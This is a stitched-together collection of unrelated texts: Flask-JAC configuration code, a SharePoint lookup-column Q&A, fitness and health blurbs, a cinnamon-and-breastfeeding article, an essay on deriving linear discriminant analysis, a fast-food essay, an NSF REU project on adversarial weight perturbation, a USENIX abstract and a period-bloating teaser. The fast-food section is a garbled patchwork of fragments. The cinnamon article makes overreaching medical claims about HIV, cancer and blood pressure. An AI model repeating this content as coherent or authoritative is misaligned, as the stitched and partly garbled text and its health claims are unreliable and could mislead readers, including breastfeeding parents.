def init_app():
    jac.init_app(app)
    app.jinja_env.compressor_debug = app.config.get('DEBUG')
    app.jinja_env.compressor_output_dir = './static'
    app.jinja_env.compressor_static_prefix = '/static'

If you do not use Flask-User, you are done. Otherwise you have to customize the static_finder function (from the file jac/contrib/flask.py) and add one more line to the configuration above:

    app.jinja_env.compressor_source_dirs = static_finder(app)

def static_finder(app):
    def find(path=None):
        if path is None:
            folders = set()
            for blueprint in app.blueprints.values():
                if blueprint.static_folder is not None:
                    folders.update([blueprint.static_folder])
            folders.update([app.static_folder])
            return folders
        bp_values = app.blueprints.values()
        # Detect Flask-User: its blueprint serves static files under the
        # endpoint prefix 'user', not 'flask_user', so rename it first.
        if 'flask_user' in [x.name for x in bp_values]:
            app.blueprints['flask_user'].name = 'user'
        for rule in app.url_map.iter_rules():
            if '.' in rule.endpoint:
                with_blueprint = True
                blueprint_name = rule.endpoint.rsplit('.', 1)[0]
                for x in bp_values:
                    if x.name == blueprint_name:
                        blueprint = x
                data = rule.match(u('{subdomain}|{path}').format(
                    subdomain=blueprint.subdomain or '',
                    path=path,
                ))
            else:
                with_blueprint = False
                data = rule.match(u('|{0}').format(path))
            if data:
                static_folder = (blueprint.static_folder
                                 if with_blueprint and blueprint.static_folder is not None
                                 else app.static_folder)
                return os.path.join(static_folder, data['filename'])
        raise IOError(2, u('File not found {0}.').format(path))
    return find
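For orientation, here is a consolidated sketch of the wiring described above. It only rearranges the article's own calls; the route, template name, and file layout are illustrative assumptions, and the {% compress %} tag shown in the comment follows jac's documented template usage.

from flask import Flask, render_template
from jac.contrib.flask import JAC

app = Flask(__name__)
jac = JAC()

def init_app():
    jac.init_app(app)
    app.jinja_env.compressor_debug = app.config.get('DEBUG')
    app.jinja_env.compressor_output_dir = './static'
    app.jinja_env.compressor_static_prefix = '/static'
    # Only needed when Flask-User is installed (see static_finder above):
    app.jinja_env.compressor_source_dirs = static_finder(app)

@app.route('/')
def index():
    # In index.html, wrap assets in jac's tag, e.g.:
    # {% compress 'css' %}<link rel="stylesheet" href="style.css">{% endcompress %}
    return render_template('index.html')

if __name__ == '__main__':
    init_app()
    app.run()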
Q: I have defined a content type in the content type hub. I would like to use this content type on a site (other than the hub) but also to extend it with an additional (lookup) column. Is it possible to do so while preserving the synchronization of the content type with the content type hub?

The reason I need this in the first place is that I cannot create a lookup column within the content type hub and make it work in another site collection. I've read somewhere that if you create the list the lookup is targeting inside the content type hub site, make a template from it, and then recreate that same list on another site, the lookup will work. But it doesn't; I expected this, because the GUIDs don't match. So is there a way to solve this?

A: Regardless of the content type hub, working with lookup columns can be tricky. You either create them declaratively (at the time of content type deployment), which assumes the list you are targeting is already there (or is self-referencing, the same way the Tasks or Issues lists work), or you use code, say in a FeatureActivated handler, where you can create the lookup programmatically and attach it to the list, possibly targeting a content type at the SPWeb level.

So, a potential solution for you (assuming you have already properly published content types from the CT hub) is either to manually add the lookup column on the list, or to manually create a new content type at the web level that inherits from the site-collection-level content type published by the CT hub, and add the lookup at the SPWeb level, since this way you can target the proper list. Or, programmatically, create a new SPContentType using the constructor that lets you pass in the SPContentTypeId of the parent, and add it directly to the SPWeb.ContentTypes collection. Once the SPWeb is updated, you can create a new lookup column and link it to your new content type.

Comment: @Marius, thanks for replying. I have thought of going for the approach in which I manually create an inheriting content type at the web level and extend it with the lookup column. This, however, breaks the synchronization with the CT hub, i.e. if I edit the content type in the hub after the web-level content type is created, it (the inheriting content type) does not get updated. It looks like the inheritance breaks the dependency on the content type in the content type hub. – Boris, Jul 13 '12 at 11:44
Spend Just 12 Minutes Each Day: Easy Exercises to Give You Hot Legs

Looking to burn thigh fat? You are in luck. The video featured below shows how you can burn thigh fat with just 12 minutes a day.

According to the Mayo Clinic, one of the most effective ways to burn extra calories is to integrate a combination of the following three elements into one's life:

1. Lifestyle changes: For example, the Mayo Clinic recommends a diet low in dairy and saturated fats. They recommend making small changes in daily life; for instance, try taking the stairs instead of using the elevator. The small changes add up.
2. Strength training: Muscle burns more calories, even while you are resting. The video below shows you how to do exercises from side lunges to leg lifts, both intended to define and tone those leg muscles.
3. Consistent aerobic exercise: "As a general goal, include at least 30 minutes of physical activity in your daily routine," states the Mayo Clinic. You can't get to 30 without starting by committing just 12 minutes. What better way than to make it easy? The YouTube channel XHIT Daily shows how it's done below.

The video below shows you how to lose thigh fat with just 12 minutes a day!

Source: www.healthtipsportal.com
URL of this page: //www.nlm.nih.gov/medlineplus/ency/imagepages/8976.htm

Infant Jaundice

Overview

Jaundice is a yellow discoloring of the skin, mucous membranes, and eyes caused by too much bilirubin (a breakdown product of hemoglobin that is processed by the liver) in the blood. Jaundice occurs when excess amounts of bilirubin circulating in the bloodstream dissolve in the subcutaneous fat (the layer of fat just beneath the skin), causing a yellowish appearance of the skin and the whites of the eyes.

Update Date: 12/12/2014
Why Avoid Cinnamon While Breastfeeding

Cinnamon is used around the world for its delicious taste and health benefits. However, cinnamon consumed while breastfeeding may pose certain risks to your newborn baby. In this article, you'll learn about cinnamon, its health benefits, and the risks it poses to your breastfeeding newborn.

What Is Cinnamon?

Cinnamon comes from the inner bark of certain tree species of the genus Cinnamomum. The dried bark strips, ground powder, and derived essential oil are all used to add flavor to food. Because only a few Cinnamomum species are grown for their spice, many differentiate between the cinnamon varieties harvested. Cinnamomum verum, also called "true cinnamon" or "Ceylon," is rarely grown commercially. Most cinnamon purchased in stores comes from the related tree species Cinnamomum cassia. This cinnamon, labeled "cassia," accounts for most of the world's cinnamon supply.

Cinnamon is used to add flavor to pastries, breakfast foods, cereal, fruit, chicken, coffee, and more. Recipes, especially for sweets, often use cinnamon because of its sweet and pleasant flavor. But before we get to the question of whether it is safe to eat cinnamon while breastfeeding, let's talk about cinnamon's health benefits.

Cinnamon Health Benefits

Cinnamon provides many health benefits when eaten or taken as a supplement. Below are 12 key health benefits of cinnamon.

1. It can increase metabolism. Cinnamon is high in the compound cinnamaldehyde, which improves metabolism and can help individuals lose weight. It is common for people to add it to coffee or apple cider vinegar to reap the metabolic benefits.

2. Cinnamon has lots of antioxidants. Antioxidants benefit your body by scavenging free radicals and reducing the damage done by oxidation. They can also help prevent many diseases, such as heart disease and some cancers. One study compared the antioxidant levels in over twenty spices and found that cinnamon was the clear winner, outranking even superfoods like garlic and oregano.

3. Cinnamon has anti-inflammatory uses. Your body uses inflammation to fight infections, repair damage, and stay healthy. However, if your body's inflammatory response turns against its own tissue, it becomes a problem: heightened inflammation worsens symptoms in illnesses like asthma, arthritis, Crohn's disease, and active hepatitis. For those suffering from such conditions, cinnamon can be used for its anti-inflammatory properties.

4. It has medicinal uses because of its antiviral, antibacterial, and antifungal properties. Herbal medicine often uses cinnamon because of its healing potential. Studies have shown that cinnamon consumption can help individuals fighting infections. Over the years, cinnamon has been used to treat bad breath (caused by bacteria in the mouth), toothaches, digestion problems, and more. Some studies even suggest that cinnamon consumption can help individuals fighting certain cancers, such as colon cancer.

5. It may improve gut health. Gut health is important for fighting infection and improving overall wellbeing. Cinnamon has prebiotic properties that help your gut grow healthy bacteria while suppressing the growth of pathogenic (bad) bacteria. When consumed regularly, cinnamon can support gut health and healthier digestion.

6. Cinnamon is a good source of manganese and contains small amounts of calcium and fiber. Manganese is an important nutrient for overall health: it helps your body form connective tissue, bone, blood clots, and sex hormones, and it aids metabolism, calcium absorption, and blood sugar regulation. The small amounts of calcium and fiber in cinnamon also contribute to overall physical health.

7. It may reduce your chances of developing heart disease. Heart disease is the number one cause of premature death around the world. Some studies suggest that regular cinnamon consumption may reduce the risk of developing it. One study found that half a teaspoon of cinnamon each day had a positive effect on blood markers in patients with type 2 diabetes. Because cinnamon reduces LDL (bad) cholesterol and can also reduce blood pressure, it may lessen the overall risk of premature death from heart disease.

8. Cinnamon reduces blood pressure. Early studies indicate that consuming cinnamon with some regularity can help manage chronic high blood pressure, though more studies are needed before it can be safely relied on for this purpose. In the meantime, it can supplement conventional blood-pressure medication.

9. Cinnamon has anti-diabetic effects. Cinnamon can lower blood sugar and increase insulin sensitivity. For individuals with diabetes, cinnamon consumption may help them manage their illness without the need for more insulin injections. Despite these effects, diabetics should always monitor their blood sugar levels carefully, and cinnamon should never replace emergency diabetic medication.

10. It can relieve digestive discomfort. Cinnamon has been used in many cultures to treat gas and digestive imbalances. To aid digestion, many people brew cinnamon into a warm drink such as tea; drinking warm cinnamon tea can help reduce or alleviate digestion problems.

11. Some studies show it may reduce the risk of some cancers. As mentioned above, studies suggest cinnamon is useful in the prevention and treatment of some cancers by reducing the growth of cancer cells in the human body. Because it increases certain enzymes in the colon, it may be particularly helpful in reducing the growth of colon cancer cells.

12. There is some evidence that it can help fight the HIV virus. Cassia cinnamon may help fight HIV-1, the most common strain of the HIV virus. One study compared cinnamon to over sixty other plants and found that cinnamon was the most effective against HIV-infected cells. However, more studies and trials are needed to determine whether cinnamon is a viable part of HIV treatment.

Cinnamon and Breastfeeding

Although cinnamon has many health benefits, using it as a medicine while breastfeeding poses certain risks. Coumarin, a component that contributes to cinnamon's flavor, can be harmful in larger quantities. Because coumarin levels are lower in Ceylon cinnamon than in cassia, Ceylon cinnamon is safer to consume.

Cinnamon is often used for its ability to increase metabolism. However, if this effect is passed on to a breastfeeding baby through breast milk, it can cause problems: an increased metabolism and lowered blood sugar levels can be dangerous to your baby. Consuming too much cinnamon while breastfeeding can cause these problems. It is important to note that cinnamon is not regulated by the FDA, which is why the full effects and risks of using cinnamon while breastfeeding remain unknown.

Additionally, consuming large amounts of cinnamon while breastfeeding can give breast milk a cinnamon flavor. This may cause your baby to stop drinking your milk because they don't like the change in flavor. It may also cause indigestion in your baby, since their body is still developing and may not be ready to digest cinnamon. In extreme cases, your baby may develop an allergic reaction to cinnamon.

Because these possible risks to your baby haven't yet been sufficiently studied, it's important to consult a doctor before taking or consuming cinnamon while breastfeeding. Your doctor is best equipped to help you navigate any dietary changes during pregnancy and breastfeeding.

Is It Safe to Take Cinnamon Supplements While Breastfeeding?

Cinnamon supplements are popular for a variety of reasons. By taking supplements made with cinnamon essential oil or concentrated amounts of cinnamon, a person can reap the health benefits without needing to put large quantities of it into their food. However, most of the risks around using cinnamon while breastfeeding revolve around taking supplements. Your baby faces the following risks when you take cinnamon supplements while breastfeeding:

• Risk of an allergic reaction (hives, swelling of the tongue and throat, burning sensation in the mouth)
• Lowered blood sugar
• Thinning of the blood

It's important to ask your doctor about taking cinnamon supplements while breastfeeding. Although these supplements pose risks to your child, your doctor is better equipped to advise you of them.

Can You Eat Cinnamon While Breastfeeding?

Cinnamon, when used in food, is generally considered safe for new moms who are breastfeeding. Most of the risk to your baby comes from supplements or eating large quantities of cinnamon. The amounts used in everyday dishes may not pose as much risk to your breastfeeding child.

If you regularly eat dishes with cinnamon in them, take note of how your child reacts to your milk. If your baby refuses to drink, develops indigestion, or shows signs of an allergic reaction, discontinue consuming cinnamon. For babies with sensitivities to cinnamon, even small amounts consumed by the mother can cause problems. If you're unsure whether cinnamon is causing your child's symptoms, consult your doctor, who can give you information about the risks and benefits of eating cinnamon while breastfeeding.

Can I Drink Cinnamon Tea While Breastfeeding?

Cinnamon tea can be a relaxing and beneficial drink for breastfeeding mothers. Women enjoy drinking it because it boosts immunity and metabolism while aiding digestion. However, drinking too much cinnamon tea while breastfeeding can be risky for your newborn. Instead of using cinnamon powder, brew your tea lightly with one small cinnamon stick, and make sure you're only having one cup each day, especially if you're consuming cinnamon in other forms. If your child exhibits symptoms of cinnamon sensitivity, discontinue the tea and consult your doctor.

Conclusion

Despite its health benefits, cinnamon may pose significant risks to your breastfeeding baby when used in large amounts. When you consume large quantities of cinnamon, your baby is at increased risk of digestive issues. In addition, some babies have allergic reactions to cinnamon that can be life-threatening. If your baby exhibits signs of indigestion or a cinnamon allergy, discontinue cinnamon consumption and consult your doctor, who can help you determine whether cinnamon consumption is causing your baby's health problems.

Related:
Can I Drink Slimfast While Breastfeeding
Can You Take Elderberry While Breastfeeding
Ashwagandha While Breastfeeding – Is It Safe?
Herbalife While Breastfeeding
Why Does the Textbook LDA Look the Way It Does?

Author: DeAlVe (master's student; research area: pattern recognition and machine learning)

Linear Discriminant Analysis (LDA) is a supervised dimensionality-reduction method, and no machine learning textbook is complete without introductions to PCA and LDA. The standard formulation of LDA is the following (the two-class version; the multi-class case is discussed at several key points below):

    max_w  J(w) = (w^T S_b w) / (w^T S_w w)

where S_b = (m_1 - m_2)(m_1 - m_2)^T is the between-class scatter matrix, S_w is the within-class scatter matrix (the sum of each class's scatter around its own mean), and w is the projection line.

Looks familiar, doesn't it? This is exactly what classic LDA looks like, and its goal is intuitive: project the two classes of samples onto a line such that, after projection, the ratio of the between-class scatter to the within-class scatter is maximized.

Three terms in that sentence (the between-class scatter matrix, a line, and the ratio) hide three questions:

1. Why the between-class scatter matrix? Isn't the plain mean difference m_1 - m_2 more intuitive? Does it give the same solution?
2. Why project onto a line rather than onto a hyperplane? PCA projects d-dimensional samples onto a c-dimensional subspace (c < d); why can't LDA?
3. Why the ratio of between-class to within-class scatter? Wouldn't the difference do?

This article works through these three questions. We first review how classic LDA is solved, then address them in turn.

Reviewing classic LDA

The original problem is equivalent to

    max_w  w^T S_b w    s.t.  w^T S_w w = 1

Apply the method of Lagrange multipliers,

    L(w, λ) = w^T S_b w - λ (w^T S_w w - 1),

set the derivative to zero, and obtain

    S_b w = λ S_w w.

Eigendecomposing S_w^{-1} S_b yields w, but there is a simpler route: S_b w = (m_1 - m_2)(m_1 - m_2)^T w, where (m_1 - m_2)^T w is a scalar, so S_b w is collinear with m_1 - m_2, and hence so is λ w. This gives

    w ∝ S_w^{-1}(m_1 - m_2),

and the solve is complete. Very elegant, worthy of a textbook classic: a clean, single pass of the Lagrange multiplier method. Still, the solution relies on one small trick, namely that (m_1 - m_2)^T w is a scalar, which spares us the eigendecomposition.

Can we be greedier and find a derivation that needs no trick at all? We can; the next section does exactly that.

Between-class scatter & mean difference

Let us drop the between-class scatter matrix and use the more intuitive mean difference m_1 - m_2 instead:

    max_w  w^T (m_1 - m_2)    s.t.  w^T S_w w = 1

Again with Lagrange multipliers,

    L(w, λ) = w^T (m_1 - m_2) - λ (w^T S_w w - 1),

setting the derivative to zero gives

    m_1 - m_2 = 2λ S_w w,

so once more

    w ∝ S_w^{-1}(m_1 - m_2).

Isn't that simpler? No tricks at all, just one step after another.

Why is the mean difference more intuitive? Think about it: LDA wants the two projected classes far apart and each class compact. The most direct way to make a class compact is to minimize its variance, which is exactly the within-class scatter. The most direct way to push the classes apart is surely to maximize the difference of the means, not the mean difference times its own transpose, which is a rather odd object.

Then why does classic LDA use the between-class scatter matrix? My personal view is that the resulting expression is more elegant: the numerator and denominator are homogeneous (both quadratic in w), and the objective is precisely the generalized Rayleigh quotient. Although the classic derivation is less direct, the problem statement is more standardized and the trick it needs is simple enough not to trouble anyone, so LDA presumably ended up with the between-class scatter matrix.

Line & hyperplane

The previous question was a warm-up without much consequence; this one really matters: why does LDA project directly onto a line (one dimension) instead of onto a hyperplane (several dimensions) the way PCA does?

Let us simply try. Suppose we project the samples onto W = (w_1, ..., w_c), where every w_i is a direction like the w of classic LDA. This amounts to projecting onto c lines instead of one, which in turn amounts to projecting onto a c-dimensional subspace. The projected coordinates are

    y = W^T x,

so the means project the same way, to W^T m_1 and W^T m_2. The squared norm of the projected mean difference is

    || W^T (m_1 - m_2) ||^2
      = (m_1 - m_2)^T W W^T (m_1 - m_2)
      = tr( W^T (m_1 - m_2)(m_1 - m_2)^T W )
      = tr( W^T S_b W ).

Why use the trace in the last line rather than the inner product in the first? Because the trace form lets the between-class scatter reappear, keeping the same shape as classic LDA.

Recall the classic form and, by analogy, take the constraint W^T S_w W = I. (In fact the constraint W^T W = I would also work; both merely restrict the solution space of W, and the resulting solutions are equivalent. What is the difference between them? I found one point. The columns of W are the c projection lines, and for projecting onto these c lines to be equivalent to projecting onto a c-dimensional subspace, the lines must be linearly independent, i.e. rank(W) = c. Look at W^T S_w W = I: the right-hand side has rank c, and since the rank of a product is at most the rank of each factor, every factor on the left must have rank at least c, hence rank(W) = c. So this constraint guarantees that we really are projecting onto a c-dimensional subspace, while W^T W = I does not state this explicitly. My understanding of matrices is not deep enough to tell whether W^T W = I also implies the rank condition, so to be safe I choose the constraint with the explicit rank guarantee.) This yields the higher-dimensional-projection version of LDA:

    max_W  tr(W^T S_b W)    s.t.  W^T S_w W = I,  rank(W) = c

Solve it with Lagrange multipliers again,

    L(W, Λ) = tr(W^T S_b W) - tr( Λ (W^T S_w W - I) ),

set the derivative to zero, and obtain

    S_b W = S_w W Λ.

In most cases a sum of covariance matrices is invertible; even when it is not, the machinery for generalized eigenvalue problems still applies, but for convenience we assume invertibility here:

    S_w^{-1} S_b W = W Λ.

So we just eigendecompose S_w^{-1} S_b to get d eigenvectors, pick the c eigenvectors with the largest eigenvalues to form W, and we have our projection onto a c-dimensional subspace, right?

Really?

No. We can certainly pick out c eigenvectors, but only one of them is the one we actually want; the other c - 1 are meaningless. Observe:

    S_b w = (m_1 - m_2) (m_1 - m_2)^T w.

See it? The factor (m_1 - m_2) on the right is a vector, in other words a matrix of rank one. The rank of the product therefore cannot exceed one, and the product is not the zero matrix, so

    rank(S_w^{-1} S_b) = 1.

A rank-one matrix has only one nonzero eigenvalue and only one eigenvector belonging to a nonzero eigenvalue.

One might ask: what about the eigenvectors of the zero eigenvalues, can't we use those? We cannot. Look at the objective function. From the optimality condition we just derived,

    tr(W^T S_b W) = tr(W^T S_w W Λ) = tr(Λ) = λ_1 + λ_2 + ... + λ_c,

and our W can make only one of λ_1, ..., λ_d nonzero. Once the eigenvector of the single nonzero eigenvalue has been taken, no choice of the remaining c - 1 directions can increase the objective any further.

So two-class LDA can only project onto a single line.

This also explains, in passing, why K-class LDA can only project onto K - 1 dimensions; the reasoning is identical. The between-class scatter matrix of K-class LDA is

    S_b = Σ_{k=1}^{K} N_k (m_k - m)(m_k - m)^T.

It is a sum of K rank-one matrices (each m_k - m is a vector), so its rank is at most K. Moreover, Σ_k N_k (m_k - m) = 0, so one of the K terms can be expressed linearly by the others, and rank(S_b) ≤ K - 1. Therefore S_w^{-1} S_b has only K - 1 nonzero eigenvalues, and K-class LDA can project onto at most K - 1 dimensions.

Wait, how did the third question go again? Could replacing the ratio with a difference remove this restriction on the projection dimension?

Ratio & difference

The objective of classic LDA is the ratio of the projected between-class scatter to the projected within-class scatter. It is natural to ask: why insist on the ratio? What is wrong with the difference?

Let us try again. (In this section we work with the matrix W rather than the vector w, which means we are treating two-class and multi-class LDA simultaneously: simply substitute the appropriate S_b.)

Note that the difference objective can be made arbitrarily large by scaling W, so we must limit the magnitude of W, and we keep the rank restriction as well:

    max_W  tr(W^T S_b W) - tr(W^T S_w W)    s.t.  W^T W = I,  rank(W) = c

Lagrange multipliers once more,

    L(W, Λ) = tr( W^T (S_b - S_w) W ) - tr( Λ (W^T W - I) ),

and setting the derivative to zero gives

    (S_b - S_w) W = W Λ,

that is, column by column, S_b w_i = (S_w + λ_i I) w_i. If the bracketed matrix is invertible, this can be written as

    w_i = (S_w + λ_i I)^{-1} S_b w_i.

Note that rank(S_b) ≤ K - 1, so at most K - 1 directions w_i can satisfy this equation with S_b w_i ≠ 0. We still run into rank deficiency and cannot obtain more than K - 1 useful eigenvalue-eigenvector pairs.

That alone is not enough; we must also show that the new objective gains nothing from the remaining directions. Slightly rearranging the objective and using the optimality condition (slightly rearranged) together with W^T W = I,

    tr( W^T (S_b - S_w) W ) = tr(W^T W Λ) = tr(Λ).

The conclusion is unchanged: the new objective cannot be increased by directions that carry no between-class scatter.

Putting the two points together (the new matrix is still rank-deficient, and the zero eigenvalues still contribute nothing to the new objective), we conclude: replacing the ratio with the difference is also solvable, but we do not benefit from it.

If the ratio and the difference produce solutions of the same character, why did classic LDA choose the ratio? I personally suspect it is because the ratio solution has an additional intuitive interpretation that the difference version may lack, which makes it more elegant. Which interpretation? In the two-class problem, classic LDA is a special case of the least-squares criterion: let the outputs of the first-class samples equal N/N_1 and those of the second class equal -N/N_2, where N_1 and N_2 are the class sample counts; fitting this model by least squares yields exactly the solution of (ratio-based) LDA. PRML covers this derivation.

Summary

This article raised three questions about the objective function of the textbook LDA and answered them, understanding LDA more deeply step by step in the process.

Question 1: may we use the mean difference instead of the between-class scatter? Answer: yes. It is more intuitive and easier to solve. Using the between-class scatter, however, lets the LDA objective be expressed as a generalized Rayleigh quotient, homogeneous in numerator and denominator, which is more satisfying; presumably for these reasons classic LDA chose the between-class scatter.

Question 2: may K-class LDA project into a subspace of more than K - 1 dimensions? Answer: no, because the between-class scatter matrix is rank-deficient. K-class LDA can find only K - 1 eigenvectors whose eigenvalues increase the objective; even if we select other eigenvectors, we cannot benefit from them.

Question 3: may we use the difference of between-class and within-class scatter rather than their ratio? Answer: yes. The new criterion yields a new optimal solution, but we do not benefit: K-class LDA still projects onto at most a (K - 1)-dimensional space. Compared with the ratio version, the difference version also lacks the intuitive least-squares interpretation; presumably for these reasons classic LDA chose the ratio.

So the textbook LDA is a classic for good reason: it agrees with intuition in every respect, and none of the three challenges raised here gives sufficient grounds to overturn it. A classic is a classic.
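To make the closed form w ∝ S_w^{-1}(m_1 - m_2) concrete, here is a minimal two-class NumPy sketch. It is not from the article; the data and names are illustrative.

import numpy as np

rng = np.random.default_rng(0)
X1 = rng.normal(loc=[0.0, 0.0], size=(100, 2))   # class 1 samples
X2 = rng.normal(loc=[3.0, 2.0], size=(100, 2))   # class 2 samples

m1, m2 = X1.mean(axis=0), X2.mean(axis=0)
# Within-class scatter: summed (not averaged) scatter of each class
Sw = (X1 - m1).T @ (X1 - m1) + (X2 - m2).T @ (X2 - m2)

w = np.linalg.solve(Sw, m1 - m2)   # direction of the projection line
w /= np.linalg.norm(w)

# The projected class means are well separated along w:
print((X1 @ w).mean(), (X2 @ w).mean())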
Causes and Effects of Fast Food

Does fast food cause obesity? This page explores the ways that fast food contributes to the obesity problem.

One frequently quoted research abstract puts it this way: rates of obesity and insulin resistance have climbed sharply over the past 30 years, and these epidemics are temporally related to a dramatic rise in consumption of fast food. Until recently, it was not known whether the fast food was driving the obesity, or vice versa. The review examines the unique properties of fast food that make it the ideal obesigenic foodstuff.

A student writes: "I am writing an essay on the effects of fast food on the human body. I am having trouble putting all the facts into paragraphs. All the things eating fast food causes (heart disease, weight gain, bad eating habits, etc.) are all happening because of the same reason: how bad the food is." A typical essay thesis reads, "The fast food industry has a harmful effect on society," with topic sentences such as "fast food causes coronary artery disease."

Fast food and health. Obesity is a leading cause of diabetes, so eating fast food does nothing to decrease your odds; stroke and heartburn are also commonly listed side effects of fast food consumption, since fast foods often contain too many calories and too little nutrition. In many cases fast food is highly processed and contains large amounts of carbohydrates, and taking in high amounts of carbs causes a spike in your blood sugar. Eating fast food may also cause skin issues such as acne, and anxiety and depression aren't the only mental effects it can induce: a new study, along the same lines as its predecessors, links eating fast food to a greater risk of suffering from depression. A recent study evaluating the effects of fast-food-based overeating on liver enzymes and liver triglyceride content has also been making the news. Drinks offered at fast-food restaurants often contain caffeine, which speeds up the metabolism a bit, and some critiques focus on the effects of beef production on the rainforest.

Fast food and children. Obesity in children increases the more hours they watch television, and children's exposure to TV ads for unhealthy food products (i.e., high-calorie, low-nutrient snacks, fast foods, and sweetened drinks) is a significant risk factor for obesity. The food industry claims its products are not the primary cause, but compared with kids who did not eat fast food, children and adolescents who ate fast food consumed 126 more calories on days when they ate it. Obesity during childhood can harm the body in a variety of ways.

The industry. Fast food in the US has grown from a $6 billion-a-year industry in 1970 [1] into a far larger one. Minority communities are disproportionately affected: obesity rates are higher among some groups than among whites, and fast food is cited as one of the main causes of this deadly disparity. Eating out also has measurable effects on nutrition and body weight. The fast food industry spent more than $4.2 billion in 2009 on TV advertising and other media, and these advertisements are one reason people like to try new foods every day. An economic study, "The Effect of Fast Food Restaurants on Obesity and Weight Gain" (Janet Currie, Stefano DellaVigna, Enrico Moretti, and Vikram Pathania; NBER Working Paper No. 14721, issued February 2009, revised December 2011), examines the causal relationship directly.

Food safety. Millions of people in the United States get sick from contaminated food. Symptoms of food poisoning include upset stomach and may range from mild to severe; bacteria and viruses are the most common causes.

Why fast food is popular. Fast food restaurants have appeared in large quantities all over the world and have become more and more popular because fast food can be prepared and served very quickly, which suits the modern lifestyle; many people, particularly young people, prefer to eat fast food instead of cooking meals at home. Explaining the causes of this popularity, and the results it may have, is itself a common essay assignment.

On cause-and-effect essays generally: a cause such as "we cut trees excessively" can have effects such as "rivers dry up, rainfall is low, harvests are poor, and the population has no food." Lists of cause-and-effect essay topics routinely include the causes and effects of unemployment alongside the causes and effects of fast food.
2021 NSF Research Experiences for Undergraduates (REU)

Project (4): Security Vulnerabilities in Deep Learning Deployment to Edge Devices in CPSs

Deep learning has outperformed conventional machine learning approaches. Deep learning uses the raw data itself to learn intrinsic features and make a classification or detection. This is achieved by building an architecture with a number of layers, where each layer learns a certain feature of the input data by transforming it into another abstraction. The initial layers (e.g., convolution layers and pooling layers) learn low-level features, while the deeper layers (deeper convolutional layers and fully connected layers) learn complex features by representing the data at a higher level of abstraction. Having a number of layers between the lowest and the highest therefore gives the freedom to learn more complex features than earlier architectures with a limited number of layers could.

Deep learning involves different phases, including a training phase, a testing phase, and a validation (inference) phase. Although deep learning is a very promising technique, its deployment onto edge devices, to perform the inference phase on-site, requires further investigation. First, deep learning architectures are very complex, so compressing them to fit the reduced processing capabilities of edge devices is a challenge. Second, the compressed deployments bring their own security vulnerability issues. In this project, the REU students will investigate the new security challenges associated with such deep neural network (DNN) architectures.

Studying deep convolutional neural network architectures under adversarial training: it has recently been shown that carefully and uniformly adding weight perturbations can lead to maliciously erroneous training results. However, for a large DNN, such weight perturbations can be noticeable and easy to detect. In this research task, the REU students will therefore investigate the effect of perturbing only a small subset of weights. We will combine the identification of critical weights with the weight-perturbation optimization problem, using methods such as the hardware-oriented Fast Gradient Sign Method (FGSM) and the Jacobian-based Saliency Map Approach (JSMA).

Qualifications: MATLAB, C/C++, microcontroller programming; EE, CmpE, or CmpSci major; knowledge of encryption.

Mentor: Dr. Hasan ([email protected])
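To make the attack idea concrete, here is a minimal sketch of an FGSM-style step applied to weights, as the project proposes. This is illustrative only, not the project's code: it uses a toy linear model with an analytically computed mean-squared-error gradient, and the names epsilon and top_k are assumptions.

import numpy as np

rng = np.random.default_rng(0)
X = rng.normal(size=(32, 4))   # toy inputs
y = rng.normal(size=(32,))     # toy targets
w = rng.normal(size=(4,))      # stand-in for trained weights

def loss(w_):
    return np.mean((X @ w_ - y) ** 2)

# Gradient of L = mean((Xw - y)^2) with respect to the weights w
grad = 2.0 * X.T @ (X @ w - y) / len(y)

# FGSM-style step: push every weight in the loss-increasing direction
epsilon = 0.05
w_fgsm = w + epsilon * np.sign(grad)

# Variant in the project's spirit: perturb only a few critical weights
top_k = 1
idx = np.argsort(-np.abs(grad))[:top_k]   # weights with largest gradient magnitude
w_sparse = w.copy()
w_sparse[idx] += epsilon * np.sign(grad[idx])

print(loss(w), loss(w_fgsm), loss(w_sparse))  # loss rises under both attacks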
Chronix: Long Term Storage and Retrieval Technology for Anomaly Detection in Operational Data

Authors: Florian Lautenschlager, QAware GmbH; Michael Philippsen and Andreas Kumlehn, Friedrich-Alexander-Universität Erlangen-Nürnberg; Josef Adersberger, QAware GmbH

Abstract: Anomalies in the runtime behavior of software systems, especially in distributed systems, are inevitable, expensive, and hard to locate. To detect and correct such anomalies (like instability due to a growing memory consumption, failure due to load spikes, etc.) one has to automatically collect, store, and analyze the operational data of the runtime behavior, often represented as time series. There are efficient means both to collect and analyze the runtime behavior. But traditional time series databases do not yet focus on the specific needs of anomaly detection (generic data model, specific built-in functions, storage efficiency, and fast query execution). The paper presents Chronix, a domain specific time series database targeted at anomaly detection in operational data. Chronix uses an ideal compression and chunking of the time series data, a methodology for commissioning Chronix's parameters to a sweet spot, a way of enhancing the data with attributes, an expandable set of analysis functions, and other techniques to achieve both faster query times and a significantly smaller memory footprint. On benchmarks Chronix saves 20%–68% of the space that other time series databases need to store the data and saves 80%–92% of the data retrieval time and 73%–97% of the runtime of analyzing functions.

Open Access Media

USENIX is committed to Open Access to the research presented at our events. Papers and proceedings are freely available to everyone once the event begins. Any video, audio, and/or slides that are posted after the event are also free and open to everyone. Support USENIX and our commitment to Open Access.

BibTeX

@inproceedings{202329,
  author    = {Florian Lautenschlager and Michael Philippsen and Andreas Kumlehn and Josef Adersberger},
  title     = {Chronix: Long Term Storage and Retrieval Technology for Anomaly Detection in Operational Data},
  booktitle = {15th {USENIX} Conference on File and Storage Technologies ({FAST} 17)},
  year      = {2017},
  isbn      = {978-1-931971-36-2},
  address   = {Santa Clara, CA},
  pages     = {229--242},
  url       = {https://www.usenix.org/conference/fast17/technical-sessions/presentation/lautenschlager},
  publisher = {{USENIX} Association},
  month     = feb,
}
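As background for the "compression and chunking" the abstract mentions, here is a generic sketch of why chunking plus timestamp delta-encoding shrinks operational time series. This is illustrative only and is not Chronix's actual storage format.

import struct
import zlib

timestamps = list(range(1_000_000, 1_000_000 + 60_000, 60))  # one point per minute
values = [42.0] * len(timestamps)

# Naive chunk: raw (timestamp, value) pairs
raw = b"".join(struct.pack("<qd", t, v) for t, v in zip(timestamps, values))

# Delta-encode timestamps: regular sampling becomes a run of tiny deltas
deltas = [timestamps[0]] + [b - a for a, b in zip(timestamps, timestamps[1:])]
delta_blob = b"".join(struct.pack("<qd", d, v) for d, v in zip(deltas, values))

print(len(zlib.compress(raw)), len(zlib.compress(delta_blob)))  # deltas compress far better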
Here's Why Your Jeans Likely Won't Fit Right Before Your Period

Mother Nature's monthly gift is limiting your outfit choices yet again. No matter how hard you pull at the seams, regardless of how much you suck in, your favorite pair of jeans just won't fit. Abdominal swelling, bags under your eyes, and other unpleasant indicators can be quite frustrating for every woman!

